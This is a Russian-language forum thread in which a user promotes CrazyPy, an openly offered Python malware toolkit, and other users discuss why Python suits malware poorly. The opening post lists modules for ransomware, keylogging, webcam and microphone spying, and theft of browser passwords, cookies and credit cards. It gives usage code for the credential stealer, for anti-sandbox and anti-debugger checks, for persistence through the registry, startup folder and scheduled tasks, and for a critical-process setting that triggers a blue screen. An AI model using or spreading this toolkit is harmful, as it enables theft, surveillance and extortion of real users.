Интересно CrazyPy - Пак самых нужных модулей для создания вирусов на python

[Shukumei]

Привет, решил я тут сделать одну интересную хрень на питоне.
Вообщем я сделал пак самых нужных модулей для создания малвари на питоне. (На питоне лучше вирусы вообще не писать)

Думаю вам может пригодиться.
Вот ссылка на репозиторий: https://github.com/LimerBoy/CrazyPy

• AntiAnalysis (VirtualBox, SandBox, Debugger, Emulator)
• Autorun (schtasks, registry, startup dir)
• Fun (Cdrom, Keyboard, Mouse, Wallpaper, Windows control)
• Harmful (Cryptolocker, BlockInput, Bsod, Monitor)
• Network (Whois, NetDiscover)
• Persistence (CriticalProcess, Hide file, Infect archives, Change date, Run as admin)
• Spying (Desktop screenshot, Webcam screenshot, Microphone, Keylogger, Clipboard, ActiveWindow)
• Stealer (Grabber, Wifi, Filezilla, Chromium passwords, history, bookmarks, credit cards, cookies)

Вот пример стилера:

import Stealer.Chromium.Passwords
import Stealer.Chromium.Bookmarks
import Stealer.Chromium.Cookies
import Stealer.Chromium.CreditCards
import Stealer.Chromium.History

passwords = Stealer.Chromium.Passwords.Get()
bookmarks = Stealer.Chromium.Bookmarks.Get()
cookies = Stealer.Chromium.Cookies.Get()
creditcards = Stealer.Chromium.CreditCards.Get()
history = Stealer.Chromium.History.Get()

Есть небольшая защита процесса,
при его закрытии появиться BSoD

import Persistence.CriticalProcess

# Set current process is critical
# When this process is completed, a blue screen of death will appear.
# Admin rights is required
Persistence.CriticalProcess.Set()
# Set current process is not critical
Persistence.CriticalProcess.Unset()

Пример с проверкой на VirtualBox, Sandbox:

import AntiAnalysis

Antianalysis.VirtualBox.Check() # True / False
Antianalysis.SandBox.Check()    # True / False
Antianalysis.Debugger.Check()   # True / False
Antianalysis.Emulator.Check()   # True / False

Пример с автозагрузкой (3 метода):

import Autorun.shell
import Autorun.registry
import Autorun.schtasks

# Startup dir method
if not Autorun.shell.Exists("name"):
    Autorun.shell.Install("name", "file")

# Registry edit method
if not Autorun.registry.Exists("name"):
    Autorun.registry.Install("name", "file")

# Schtasks method (Requires administrator privileges)
if not Autorun.schtasks.Exists("name"):
    Autorun.schtasks.Install("name", "file")

# Uninstall all
Autorun.shell.Uninstall("name")
Autorun.registry.Uninstall("name")
Autorun.schtasks.Uninstall("name")

И ещё очень много всего.

 

[Anorali]

Класс, но у меня вопрос - почему на python лучше не писать малварь?

 

[_ZerO_]

Класс, но у меня вопрос - почему на python лучше не писать малварь?

Ну, реверс легче, и как по мне не сильно развернутся, и вроде ещё зависимости будут.

 

[Albex]

С python часто проблема в том что скачиваешь скрипт, а к нему идут 100500+ зависимостей, причем ставить надо именно в определенных версиях. Pip находит не все и начинаешь искать каждую библиотеку и не факт, то найдешь. А если найдешь, выяснится, что нужен python 2, а не 3, pip тоже 2 версии нужен и все по новой. Есть хорошие проверенные скрипты на python, где все отлично работает, но часто и вот такие кривые скрипты попадаются. Сам по себе python - прекрасный язык, чтобы самому что-то заавтоматизировать.
В любом случае, за коллекцию спасибо.

 

[askanton]

Плюс учитывая особенность сборки, надо оооочень внимательно просмотреть каждый модуль на предмет что именно он делает

 

[Shukumei]

Плюс учитывая особенность сборки, надо оооочень внимательно просмотреть каждый модуль на предмет что именно он делает

Весь код открыт)

 

[askanton]

Весь код открыт)

Так я же не утверждаю обратного, просто призываю быть внимательными)